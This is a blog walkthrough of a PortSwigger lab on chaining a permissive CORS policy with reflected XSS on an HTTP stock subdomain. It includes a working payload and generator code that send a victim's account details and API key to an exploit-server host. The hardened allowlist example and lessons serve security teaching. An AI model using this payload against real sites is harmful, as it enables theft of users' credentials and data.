Welcome back to the biweekly Methodology Walkthrough. This time, let's see exactly how a CORS misconfiguration can affect your web application.
Objective
Craft a Javascript payload that uses CORS to retrieve the administrator’s API Key.
What is CORS?
Cross-Origin Resource Sharing (CORS) is a browser mechanism that lets a server selectively relax the same-origin policy. By answering with headers such as Access-Control-Allow-Origin and Access-Control-Allow-Credentials, a site tells the browser which other origins may read its responses, including responses sent with the user's cookies. The same-origin policy is what stops a malicious site from reading your data on another site; CORS is the controlled exception to it. When that exception is configured too loosely, for example by trusting origins the server should not trust, it hands an attacker exactly the cross-origin read the policy was meant to prevent.
Methodology
The Recon
We start this lab with very limited information.
We can see that there is a shop very similar to shops we’ve seen in previous Methodology Walkthroughs.
Digging into a product, we can see that there is a stock check feature.
It's again something we've seen before, but this time it behaves very differently.
Instead of embedding the results of the stock check in the DOM of the application, it opens an entirely new window with the results in it.
This is odd. Let's make a note of this and come back to it.
We can see next that we have the ability to login to an account with the default credentials provided, and inside the account is an API Key.
We can assume that the API Key for the administrator will also be retrieved in a similar way - let’s also make note of this here.
The last piece that we can see we have available to us is the Exploit server. We’ll be using this to deliver our attack.
Now that we've taken a look through the entire application, let's check the Site map for any glaringly obvious vulnerabilities.
We can see an issue flagged on the product page about the absence of an anti-CSRF token - another thing to make note of.
Lastly, let’s take a look in our HTTP History, specifically the AccountDetails page where our API Key was.
In the History, we can see that the details of an account are retrieved via an AJAX request, and the response has an Access-Control-Allow-Credentials header present.
That header only has a purpose when the server is willing to let other origins make cookie-bearing requests, so it suggests the application supports CORS and is worth probing.
This looks like all we’ll need for the Recon. We can begin poking around further.
Testing
Start by sending the AccountDetails request over to the Repeater and add the following header:
Origin: http://subdomain.LAB-ID.web-security-academy.net
Replace LAB-ID with the hostname of your current lab instance; the subdomain label itself can be anything.
You'll notice the Origin value is reflected back in the response's Access-Control-Allow-Origin header, alongside Access-Control-Allow-Credentials: true.
When testing, reflection is always a good sign and is often an avenue into an attack, but reflection alone does not prove a bug: the reflected value has to be one you could actually control from an attacker-reachable origin.
Try both http:// and https://. You'll see that both work.
This confirms the CORS configuration trusts any subdomain of the lab, and, more importantly, trusts it over plain HTTP as well as HTTPS. Any page served on any lab subdomain over HTTP, including one you can inject into, can therefore read authenticated responses from the main application with the victim's cookies attached.
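As an added example (not part of the original walkthrough), here is a small model of the two origin checks side by side: the permissive one the Repeater tests revealed (any subdomain, http or https) and a hardened exact-match allowlist, together with the browser-side condition under which a credentialed response becomes readable. The lab hostname, the sample origins and the function names are assumptions chosen for illustration, not the lab's actual server code.

```javascript
// Added example, not code from the original post or from the lab itself.
// LAB_HOST is an assumed placeholder; the real instance hostname goes here.
const LAB_HOST = 'LAB-ID.web-security-academy.net';

// Vulnerable check: trusts the lab host and any subdomain of it, over http
// or https. This is the behaviour the Origin reflection tests revealed.
function vulnerableCorsHeaders(origin) {
  let parsed;
  try { parsed = new URL(origin); } catch (e) { return {}; } // "null", garbage: no CORS headers
  const labHost = LAB_HOST.toLowerCase();         // URL parsing lowercases hostnames
  const host = parsed.hostname;
  const trusted = host === labHost || host.endsWith('.' + labHost);
  if (!trusted) return {};
  return {
    'Access-Control-Allow-Origin': origin,        // reflects the caller's origin
    'Access-Control-Allow-Credentials': 'true',   // and lets it send cookies
  };
}

// Hardened check: exact-match allowlist of https origins only. No subdomain
// wildcard and no plaintext http, so an XSS on stock.LAB-ID over http would
// gain nothing. Browsers serialize Origin with a lowercase host, so compare
// against that serialization.
const ALLOWED_ORIGINS = new Set(['https://' + LAB_HOST]);
function hardenedCorsHeaders(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // keeps caches from serving one origin's ACAO to another
  };
}

// Browser-side view: a page at `origin` may read a credentialed response only
// if ACAO equals its origin exactly (a "*" is rejected with credentials) and
// ACAC is exactly "true".
function canReadWithCredentials(origin, headers) {
  return headers['Access-Control-Allow-Origin'] === origin &&
         headers['Access-Control-Allow-Credentials'] === 'true';
}

// Probe the way the Testing section does: one Origin value per request.
function probe(policy, origins) {
  const result = {};
  for (const o of origins) result[o] = canReadWithCredentials(o, policy(o));
  return result;
}

// Constructed sample origins, including the ones worth trying in the Repeater.
const PROBES = [
  'https://' + LAB_HOST,                          // the app itself
  'http://stock.' + LAB_HOST,                     // the insecure stock subdomain
  'https://stock.' + LAB_HOST,
  'https://attacker.example',
  'https://' + LAB_HOST + '.attacker.example',    // suffix-spoof attempt
  'null',                                          // sandboxed iframe / file origin
];

console.log('vulnerable:', probe(vulnerableCorsHeaders, PROBES));
console.log('hardened:  ', probe(hardenedCorsHeaders, PROBES));
```

The permissive policy reads as "trusted" for both stock origins, which is what makes the XSS on the stock subdomain later in this walkthrough worth anything; the hardened one accepts only the single https origin and ignores the rest without emitting any CORS headers.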
Exploitation
Let’s revisit the suspicious stock check feature.
We can see it is loaded using a plain HTTP request against the stock subdomain:
If we send this to the Repeater, we can see in the reflected response that the productId parameter is vulnerable to reflected XSS:
Let's head over to our exploit server and enter the following payload:
<script> document.location="http://stock.LAB-ID.web-security-academy.net/?productId=<script>var xhr = new XMLHttpRequest();var url = 'https://LAB-ID.web-security-academy.net';xhr.onreadystatechange = function(){if (xhr.readyState == XMLHttpRequest.DONE) {fetch('https://exploit-ID.exploit-server.net?key=' %2b xhr.responseText)};};xhr.open('GET', url %2b '/accountDetails', true); xhr.withCredentials = true;xhr.send(null);%3c/script>&storeId=1" </script>
Make sure to enter your own lab and exploit-server identifiers.
The payload chains the two findings. It redirects the victim to the stock subdomain with a script injected into productId, so the injected script runs in the origin http://stock.LAB-ID.web-security-academy.net, which the CORS policy trusts. From there it sends a credentialed request (withCredentials = true) to /accountDetails; the browser lets the script read the response because Access-Control-Allow-Origin matches that origin and Access-Control-Allow-Credentials is true. It then exfiltrates the response body by fetching it to our exploit server, where it lands in the access log. Note the %2b and %3c: the + signs and the closing </script> tag of the inner script are URL-encoded so that the outer page's script block is not terminated early and the + signs are not turned into spaces by the stock server's query parsing; the stock server decodes them back into valid JavaScript when it reflects the parameter.
Click Store and Deliver exploit to Victim.
If we go to the Access Log, we should see the administrator's request buried in the logs, with the API Key in the query string of that logged request.
Grab the Key and submit it to solve the lab!
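As an added example (not part of the original post), the following builds the same redirect URL programmatically and checks the encoding that makes the chained payload survive the trip from the exploit server page, through the victim's browser, to the stock server. The lab, exploit-server and product identifiers are placeholders and the function names are mine; the endpoints and the shape of the inner script are the ones the walkthrough's payload uses.

```javascript
// Added example, not code from the original post. LAB_ID, EXPLOIT_ID and
// PRODUCT_ID are assumed placeholders; substitute your own instance values.
const LAB_ID = 'LAB-ID';
const EXPLOIT_ID = 'exploit-ID';
const PRODUCT_ID = '1'; // any value; the injection is appended after it

// Inner script: runs in the origin http://stock.LAB_ID..., which the CORS
// policy trusts, so the credentialed request returns the victim's account
// details and the callback ships them to the exploit server's access log.
function innerScript(labId, exploitId) {
  return [
    "var xhr = new XMLHttpRequest();",
    "var url = 'https://" + labId + ".web-security-academy.net';",
    "xhr.onreadystatechange = function(){",
    "  if (xhr.readyState == XMLHttpRequest.DONE) {",
    "    fetch('https://" + exploitId + ".exploit-server.net?key=' + xhr.responseText);",
    "  }",
    "};",
    "xhr.open('GET', url + '/accountDetails', true);",
    "xhr.withCredentials = true;",
    "xhr.send(null);",
  ].join('');
}

// Two characters would break the chain if left raw in the productId value:
//   '+'   is decoded to a space by query-string parsing, turning string
//         concatenation into a syntax error on the stock page;
//   '</'  in "</script>" would be seen by the HTML parser of the *outer*
//         exploit-server page as the end of its own <script> block, so the
//         redirect would never run.
// Percent-encoding them (%2b, %3c) keeps them inert in the outer page and
// lets the stock server decode them back when it reflects the parameter.
function encodeForQuery(script) {
  return script.replace(/\+/g, '%2b').replace(/<\//g, '%3c/');
}

// The URL the victim is sent to: reflected XSS via productId on the stock host.
function buildStockUrl(labId, exploitId, productId) {
  const injected = '<script>' + innerScript(labId, exploitId) + '</script>';
  return 'http://stock.' + labId + '.web-security-academy.net/?productId=' +
         productId + encodeForQuery(injected) + '&storeId=1';
}

// The page stored on the exploit server and delivered to the victim.
function exploitPage(labId, exploitId, productId) {
  return '<script>document.location="' +
         buildStockUrl(labId, exploitId, productId) + '"</script>';
}

// What the stock server sees for productId after decoding the query string:
// the original injected script, with '+' and '</script>' restored.
function reflectedProductId(stockUrl) {
  return new URL(stockUrl).searchParams.get('productId');
}

console.log(exploitPage(LAB_ID, EXPLOIT_ID, PRODUCT_ID));
console.log(reflectedProductId(buildStockUrl(LAB_ID, EXPLOIT_ID, PRODUCT_ID)));
```

The minimal encoding here mirrors the walkthrough's payload. Running the whole injected string through encodeURIComponent would also work and is the more robust choice when the inner script contains other reserved characters such as & or #, which would otherwise be taken as parameter or fragment delimiters.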
What We’ve Learned
We explored how a CORS misconfiguration can be leveraged to extract sensitive information. The misconfiguration on its own (trusting every subdomain, over HTTP as well as HTTPS) was not enough; it became exploitable because a reflected XSS on one of those trusted subdomains gave us code execution inside a trusted origin, and because that subdomain was served over plain HTTP. Chaining the two let the injected script read the administrator's account details with their cookies and capture the API Key. The lesson is to keep the CORS allowlist to exact, HTTPS-only origins that you control end to end: every origin you trust becomes part of your trust boundary, so a weakness on any of them, whether an XSS or a plaintext HTTP endpoint, is a weakness in your application.
Want to give the lab a try yourself? You can check it out on PortSwigger’s website here.
Securely Yours,
The Cybersec Cafe
Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.
Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.
. . .
Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!